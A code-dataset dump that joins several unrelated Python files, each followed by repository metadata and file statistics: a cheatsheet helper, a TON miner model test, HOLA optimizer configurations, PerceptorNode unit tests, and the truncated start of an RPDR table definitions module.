code/cheat/cheat/cheatsheets/__init__.py
|
cankai/cankai.github.io
|
e09a5b13adc475cb695cae03b5573cb446cca096
|
[
"Apache-2.0"
] | null | null | null |
import os
def sheets_dir():
return os.path.split(__file__)
| 12.4
| 32
| 0.741935
| 10
| 62
| 4.1
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145161
| 62
| 4
| 33
| 15.5
| 0.773585
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
7a81c5abd9b2c84f62981ab2c79fab1a94bfa254
| 909
|
py
|
Python
|
tests/test_model.py
|
heaven-pool/ton-miner
|
9376f9e8711357e3d2f6547c16cddc73266200fd
|
[
"MIT"
] | null | null | null |
tests/test_model.py
|
heaven-pool/ton-miner
|
9376f9e8711357e3d2f6547c16cddc73266200fd
|
[
"MIT"
] | null | null | null |
tests/test_model.py
|
heaven-pool/ton-miner
|
9376f9e8711357e3d2f6547c16cddc73266200fd
|
[
"MIT"
] | null | null | null |
# # -*- coding: utf-8 -*-
from app.libs import models
def test_job_models():
"""Check if 'create' are different between JobSchema objects"""
obj1 = models.JobSchema(
job_id=661422, pool_wallet='EQDv9eExabxeFmiPigOE_NscTo_SXB9IwDXz975hPWjO_cGq',
complexity='1906156863157627903919216023423475890402376096793739878410580',
seed='328574290144741374257957134907128616586', iterations='100000000000',
giver_address='kf-P_TOdwcCh0AXHhBpICDMxStxHenWdLCDLNH5QcNpwMHJ8',)
obj2 = models.JobSchema(
job_id=661422, pool_wallet='EQDv9eExabxeFmiPigOE_NscTo_SXB9IwDXz975hPWjO_cGq',
complexity='1906156863157627903919216023423475890402376096793739878410580',
seed='328574290144741374257957134907128616586', iterations='100000000000',
giver_address='kf-P_TOdwcCh0AXHhBpICDMxStxHenWdLCDLNH5QcNpwMHJ8',)
assert obj1.create_at != obj2.create_at
| 45.45
| 86
| 0.773377
| 73
| 909
| 9.383562
| 0.575342
| 0.043796
| 0.052555
| 0.058394
| 0.80292
| 0.80292
| 0.80292
| 0.80292
| 0.80292
| 0.80292
| 0
| 0.328225
| 0.138614
| 909
| 19
| 87
| 47.842105
| 0.546616
| 0.089109
| 0
| 0.615385
| 0
| 0
| 0.506699
| 0.477467
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.076923
| false
| 0
| 0.076923
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8f8ca88e66d359f5dec52cfb9424d537ad58ba44
| 38
|
py
|
Python
|
qutil/format/__init__.py
|
jaisenc/qutil
|
1485fe486f4f2141f236d25addcdc34eceb3727d
|
[
"MIT"
] | null | null | null |
qutil/format/__init__.py
|
jaisenc/qutil
|
1485fe486f4f2141f236d25addcdc34eceb3727d
|
[
"MIT"
] | null | null | null |
qutil/format/__init__.py
|
jaisenc/qutil
|
1485fe486f4f2141f236d25addcdc34eceb3727d
|
[
"MIT"
] | null | null | null |
from . import df
from . import number
| 12.666667
| 20
| 0.736842
| 6
| 38
| 4.666667
| 0.666667
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 38
| 2
| 21
| 19
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8f9681a645806047e3e598d301181941a377caa0
| 26,670
|
py
|
Python
|
analysis/optimizers/config/hola_config.py
|
cristianmatache/HOLA
|
28baeae1ee165df702f6e230b29f8433d96c7009
|
[
"Apache-2.0"
] | 10
|
2022-02-17T21:36:43.000Z
|
2022-03-21T17:56:53.000Z
|
analysis/optimizers/config/hola_config.py
|
cristianmatache/HOLA
|
28baeae1ee165df702f6e230b29f8433d96c7009
|
[
"Apache-2.0"
] | null | null | null |
analysis/optimizers/config/hola_config.py
|
cristianmatache/HOLA
|
28baeae1ee165df702f6e230b29f8433d96c7009
|
[
"Apache-2.0"
] | 2
|
2022-02-17T21:37:31.000Z
|
2022-02-23T21:06:20.000Z
|
# Copyright 2021 BlackRock, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
from dataclasses import dataclass
from typing import Type, TypeVar
from typing_extensions import Literal
from hola.algorithm import HOLA
from hola.objective import ObjectivesSpec
from hola.params import ParamsSpec
from hola.tune import safe_n_components
THolaConfig = TypeVar("THolaConfig", bound="HolaConfig")
@dataclass
class HolaConfig: # pylint: disable=too-many-instance-attributes
min_samples: int | None
configuration: int
optimizer: Literal["hola", "sobol"]
gmm_sampler: Literal["uniform", "sobol"]
explore_sampler: Literal["uniform", "sobol"]
n_components: int
min_fit_samples: int
top_frac: float
gmm_reg: float
def get_hola(self, params: ParamsSpec, objs: ObjectivesSpec) -> HOLA:
return HOLA(
params,
objs,
min_samples=self.min_samples,
gmm_sampler=self.gmm_sampler,
explore_sampler=self.explore_sampler,
n_components=self.n_components,
min_fit_samples=self.min_fit_samples,
gmm_reg=self.gmm_reg,
top_frac=self.top_frac,
)
@classmethod
def sobol(cls: Type[THolaConfig], n_iterations: int) -> THolaConfig:
return cls(
min_samples=n_iterations,
configuration=0,
optimizer="sobol",
gmm_sampler="sobol",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
@classmethod
def hola(cls: Type[THolaConfig], n_iterations: int, configuration: int, n_dim: int) -> THolaConfig:
# pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
if configuration == 1:
return cls(
min_samples=max(n_dim**2, 20),
configuration=configuration,
optimizer="hola",
gmm_sampler="sobol",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 2:
return cls(
min_samples=n_iterations // 3,
configuration=configuration,
optimizer="hola",
gmm_sampler="sobol",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 3:
return cls(
min_samples=n_iterations // 2,
configuration=configuration,
optimizer="hola",
gmm_sampler="sobol",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 4:
return cls(
min_samples=max(n_dim**2, 20),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 5:
return cls(
min_samples=n_iterations // 3,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 6:
return cls(
min_samples=max(n_dim**2, 20),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="uniform",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 7:
return cls(
min_samples=n_iterations // 3,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="uniform",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 8:
return cls(
min_samples=50,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 9: # bad
return cls(
min_samples=max(n_dim**2, 20),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=4,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 10: # bad
return cls(
min_samples=max(n_dim**2, 20),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=5,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 11:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 12:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="sobol",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 13:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 14:
return cls(
min_samples=100,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 15:
return cls(
min_samples=n_iterations // 3,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 16:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=10,
min_fit_samples=10,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 17:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=15,
min_fit_samples=15,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 18:
return cls(
min_samples=25,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 19:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="sobol",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 20:
return cls(
min_samples=n_dim * 30,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 21:
return cls(
min_samples=n_dim * 20,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 22:
return cls(
min_samples=n_dim * 20,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.5,
gmm_reg=0.0005,
)
if configuration == 23:
return cls(
min_samples=10 * n_dim + 20,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 24:
return cls(
min_samples=10 * n_dim + 20,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.5,
gmm_reg=0.0005,
)
if configuration == 25:
return cls(
min_samples=min(n_iterations // 4, 10 * n_dim + 30),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 26:
return cls(
min_samples=min(n_iterations // 4, 10 * n_dim + 30),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.33,
gmm_reg=0.0005,
)
if configuration == 27:
return cls(
min_samples=min(n_iterations // 4, 10 * n_dim + 30),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.5,
gmm_reg=0.0005,
)
if configuration == 28:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.33,
gmm_reg=0.0005,
)
if configuration == 29:
return cls(
min_samples=min(n_iterations // 4, 5 * n_dim + 35),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 30:
return cls(
min_samples=min(n_iterations // 4, 5 * n_dim + 35),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.33,
gmm_reg=0.0005,
)
if configuration == 31:
return cls(
min_samples=max(min(n_iterations // 4, 10 * n_dim + 30), 60),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=15,
min_fit_samples=15,
top_frac=0.33,
gmm_reg=0.0005,
)
if configuration == 32:
return cls(
min_samples=max(min(n_iterations // 4, 10 * n_dim + 30), 60),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=15,
min_fit_samples=15,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 33:
min_samples = get_min_samples_33(n_iterations, n_dim)
top_frac = 0.25
n_components = get_n_components(n_dim, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 34:
top_frac = 0.25
min_samples = get_min_samples_33(n_iterations, n_dim)
n_components = safe_n_components(15, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 35:
top_frac = 0.25
min_samples = get_min_samples_33(n_iterations, n_dim)
n_components = safe_n_components(15, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.001,
)
if configuration == 36:
top_frac = 0.25
min_samples = get_min_samples_33(n_iterations, n_dim)
n_components = safe_n_components(20, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.001,
)
# pq_data_3
if configuration == 37:
top_frac = 0.25
min_samples = 40
n_components = safe_n_components(7, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 38:
top_frac = 0.25
min_samples = 60
n_components = safe_n_components(7, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 39:
top_frac = 0.25
min_samples = 40
n_components = safe_n_components(15, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 40:
top_frac = 0.25
min_samples = 60
n_components = safe_n_components(15, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 41:
top_frac = 0.25
min_samples = 60
n_components = safe_n_components(3, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 42:
top_frac = 0.25
min_samples = 40
n_components = safe_n_components(3, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 43:
top_frac = 0.2
min_samples = 60
n_components = safe_n_components(7, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 44:
top_frac = 0.2
min_samples = 100
n_components = safe_n_components(7, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 45:
top_frac = 0.25
min_samples = 20
n_components = safe_n_components(7, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 46:
top_frac = 0.25
min_samples = 20
n_components = safe_n_components(15, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 47:
top_frac = 0.25
min_samples = 20
n_components = safe_n_components(3, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 48:
top_frac = 0.25
min_samples = min(n_iterations // 5, 2 * n_dim + 50)
n_components = safe_n_components(n_dim + 1, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 49:
top_frac = 0.2
min_samples = min(n_iterations // 5, 2 * n_dim + 50)
n_components = safe_n_components(n_dim + 1, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 50:
top_frac = 0.25
min_samples = min(n_iterations // 5, 2 * n_dim + 50)
n_components = safe_n_components(2 * n_dim, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 51:
top_frac = 0.2
min_samples = min(n_iterations // 5, 2 * n_dim + 50)
n_components = safe_n_components(2 * n_dim, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
raise ValueError("Unknown HOLA configuration")
def get_min_samples_33(n_iterations: int, n_dim: int) -> int:
return min(
n_iterations // 4, # If n_iterations is small -> only explore for a quarter, if it's too large use n_dim
2 * n_dim + 50, # The more dimensions the more initial exploration
)
def get_n_components(n_dim: int, min_samples: int, top_frac: float) -> int:
return safe_n_components(n_dim + 10, min_samples, top_frac)
| 35.56
| 113
| 0.491864
| 2,599
| 26,670
| 4.761062
| 0.074259
| 0.119121
| 0.057782
| 0.079845
| 0.85316
| 0.843543
| 0.827622
| 0.827622
| 0.827622
| 0.827622
| 0
| 0.049651
| 0.429846
| 26,670
| 749
| 114
| 35.607477
| 0.764106
| 0.031084
| 0
| 0.779006
| 0
| 0
| 0.035046
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006906
| false
| 0
| 0.01105
| 0.005525
| 0.107735
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8ffafdc284550d6e3de29dacf4c8c4343f97a09a
| 8,034
|
py
|
Python
|
src/darcyai/tests/perceptor/test_perceptor_node.py
|
edgeworx/darcyai
|
a92f0615b7cecdfe1317a8de533fdf12cedec89b
|
[
"MIT"
] | null | null | null |
src/darcyai/tests/perceptor/test_perceptor_node.py
|
edgeworx/darcyai
|
a92f0615b7cecdfe1317a8de533fdf12cedec89b
|
[
"MIT"
] | null | null | null |
src/darcyai/tests/perceptor/test_perceptor_node.py
|
edgeworx/darcyai
|
a92f0615b7cecdfe1317a8de533fdf12cedec89b
|
[
"MIT"
] | null | null | null |
import pytest
from unittest.mock import Mock, patch
from darcyai.perceptor.perceptor_node import PerceptorNode
from darcyai.tests.perceptor_mock import PerceptorMock
from darcyai.perception_object_model import PerceptionObjectModel
from darcyai.stream_data import StreamData
class TestPerceptor:
"""
PerceptorNode tests.
"""
def test_init_happy_path(self):
input_callback_mock = Mock()
perceptor_mock = PerceptorMock(sleep=0)
perceptor_node = PerceptorNode(
"name",
perceptor_mock,
input_callback_mock.method,
multi=False,
accelerator_idx=0)
assert perceptor_node is not None
def test_init_fails_when_perceptor_name_is_none(self):
input_callback_mock = Mock()
perceptor_mock = PerceptorMock(sleep=0)
with pytest.raises(Exception) as context:
PerceptorNode(
None,
perceptor_mock,
input_callback_mock.method,
multi=False,
accelerator_idx=0)
assert "perceptor_name is required" in str(context.value)
def test_init_fails_when_perceptor_name_is_not_of_type_string(self):
input_callback_mock = Mock()
perceptor_mock = PerceptorMock(sleep=0)
with pytest.raises(Exception) as context:
PerceptorNode(
1,
perceptor_mock,
input_callback_mock.method,
multi=False,
accelerator_idx=0)
assert "perceptor_name must be a string" in str(context.value)
def test_init_fails_when_perceptor_is_none(self):
input_callback_mock = Mock()
with pytest.raises(Exception) as context:
PerceptorNode(
"name",
None,
input_callback_mock.method,
multi=False,
accelerator_idx=0)
assert "perceptor is required" in str(context.value)
def test_init_fails_when_perceptor_is_not_of_type_perceptor(self):
input_callback_mock = Mock()
with pytest.raises(Exception) as context:
PerceptorNode(
"name",
1,
input_callback_mock.method,
multi=False,
accelerator_idx=0)
assert "perceptor must be an instance of Perceptor" in str(
context.value)
def test_init_fails_when_input_callback_is_not_of_type_function(self):
perceptor_mock = PerceptorMock(sleep=0)
with pytest.raises(Exception) as context:
PerceptorNode(
"name",
perceptor_mock,
1,
multi=False,
accelerator_idx=0)
assert "input_callback must be a function" in str(context.value)
def test_init_fails_when_output_callback_is_not_of_type_function(self):
input_callback_mock = Mock()
perceptor_mock = PerceptorMock(sleep=0)
with pytest.raises(Exception) as context:
PerceptorNode(
"name",
perceptor_mock,
input_callback_mock.method,
output_callback=1,
multi=False,
accelerator_idx=0)
assert "output_callback must be a function" in str(context.value)
def test_add_child_perceptor_adds_perceptor_to_children(self):
input_callback_mock = Mock()
perceptor_mock = PerceptorMock(sleep=0)
perceptor_node = PerceptorNode(
"parent",
perceptor_mock,
input_callback_mock.method,
multi=False,
accelerator_idx=0)
perceptor_node.add_child_perceptor("child")
assert len(perceptor_node.get_child_perceptors()) == 1
assert perceptor_node.get_child_perceptors()[0] == "child"
def test_remove_child_perceptor_removes_perceptor_from_children(self):
input_callback_mock = Mock()
perceptor_mock = PerceptorMock(sleep=0)
perceptor_node = PerceptorNode(
"parent",
perceptor_mock,
input_callback_mock.method,
multi=False,
accelerator_idx=0)
perceptor_node.add_child_perceptor("child")
assert len(perceptor_node.get_child_perceptors()) == 1
perceptor_node.remove_child_perceptor("child")
assert len(perceptor_node.get_child_perceptors()) == 0
def test_add_child_perceptor_fails_when_perceptor_name_is_none(self):
input_callback_mock = Mock()
perceptor_mock = PerceptorMock(sleep=0)
perceptor_node = PerceptorNode(
"parent",
perceptor_mock,
input_callback_mock.method,
multi=False,
accelerator_idx=0)
with pytest.raises(Exception) as context:
perceptor_node.add_child_perceptor(None)
assert "perceptor_name is required" in str(context.value)
def test_add_child_perceptor_fails_when_perceptor_name_is_not_of_type_string(
self):
input_callback_mock = Mock()
perceptor_mock = PerceptorMock(sleep=0)
perceptor_node = PerceptorNode(
"parent",
perceptor_mock,
input_callback_mock.method,
multi=False,
accelerator_idx=0)
with pytest.raises(Exception) as context:
perceptor_node.add_child_perceptor(1)
assert "perceptor_name must be a string" in str(context.value)
def test_get_child_perceptors_returns_list_of_child_perceptors(self):
input_callback_mock = Mock()
perceptor_mock = PerceptorMock(sleep=0)
perceptor_node = PerceptorNode(
"parent",
perceptor_mock,
input_callback_mock.method,
multi=False,
accelerator_idx=0)
perceptor_node.add_child_perceptor("child1")
perceptor_node.add_child_perceptor("child2")
assert len(perceptor_node.get_child_perceptors()) == 2
def test_run_calls_output_callback(self):
input_callback_mock = Mock()
output_callback_mock = Mock()
perceptor_mock = PerceptorMock(sleep=0)
perceptor_node = PerceptorNode(
"parent",
perceptor_mock,
input_callback_mock.method,
output_callback_mock.method,
multi=False,
accelerator_idx=0)
return_value = "Hello!"
stream_data = StreamData([1, 2, 3], 1)
pom = PerceptionObjectModel()
with patch.object(PerceptorMock, "run", return_value=return_value):
perceptor_node.run(stream_data, pom)
output_callback_mock.method.assert_called_once_with(return_value, pom)
def test_run_returns_result_of_output_callback(self):
input_callback_mock = Mock()
return_value = "output_callback"
output_callback_mock = Mock()
output_callback_mock.method.return_value = return_value
perceptor_mock = PerceptorMock(sleep=0)
perceptor_node = PerceptorNode(
"parent",
perceptor_mock,
input_callback_mock.method,
output_callback_mock.method,
multi=False,
accelerator_idx=0)
stream_data = StreamData([1, 2, 3], 1)
pom = PerceptionObjectModel()
assert perceptor_node.run(stream_data, pom) == return_value
def test_run_returns_result_of_perceptor(self):
input_callback_mock = Mock()
perceptor_mock = PerceptorMock(sleep=0)
perceptor_node = PerceptorNode(
"parent",
perceptor_mock,
input_callback_mock.method,
multi=False,
accelerator_idx=0)
return_value = "perceptor_result"
stream_data = StreamData([1, 2, 3], 1)
pom = PerceptionObjectModel()
with patch.object(PerceptorMock, "run", return_value=return_value):
assert perceptor_node.run(stream_data, pom) == return_value
| 33.061728
| 81
| 0.631441
| 862
| 8,034
| 5.530162
| 0.102088
| 0.085588
| 0.099853
| 0.075519
| 0.861129
| 0.85022
| 0.814558
| 0.763373
| 0.752465
| 0.709041
| 0
| 0.00923
| 0.29873
| 8,034
| 242
| 82
| 33.198347
| 0.836883
| 0.002489
| 0
| 0.769634
| 0
| 0
| 0.048387
| 0
| 0
| 0
| 0
| 0
| 0.089005
| 1
| 0.078534
| false
| 0
| 0.031414
| 0
| 0.115183
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
890959ee75f3ec356a4dec0962922b3df32e5949
| 163,037
|
py
|
Python
|
rpdrdefs.py
|
nareynolds/pyRPDR
|
6c0634c04f6622d608adf14b67cf0ca2659d3fc9
|
[
"MIT"
] | 2
|
2020-12-30T18:14:51.000Z
|
2021-01-18T03:32:37.000Z
|
rpdrdefs.py
|
nareynolds/pyRPDR
|
6c0634c04f6622d608adf14b67cf0ca2659d3fc9
|
[
"MIT"
] | null | null | null |
rpdrdefs.py
|
nareynolds/pyRPDR
|
6c0634c04f6622d608adf14b67cf0ca2659d3fc9
|
[
"MIT"
] | 2
|
2015-07-14T18:30:44.000Z
|
2019-10-17T19:29:59.000Z
|
# rpdrtables.py
# get csv tools
from csv import QUOTE_NONE
# get namedtuple
from collections import namedtuple
#--------------------------------------------------------------------------------------------
# define RPDR table column foreign key reference
ForeignKeyRef = namedtuple('ForeignKeyRef','table column')
# define RPDR table column date/time reformat map
DateReformat = namedtuple('DateReformat','format reformat')
SQLITE_DATE_FORMAT = '%Y-%m-%d'
# define RPDR table column
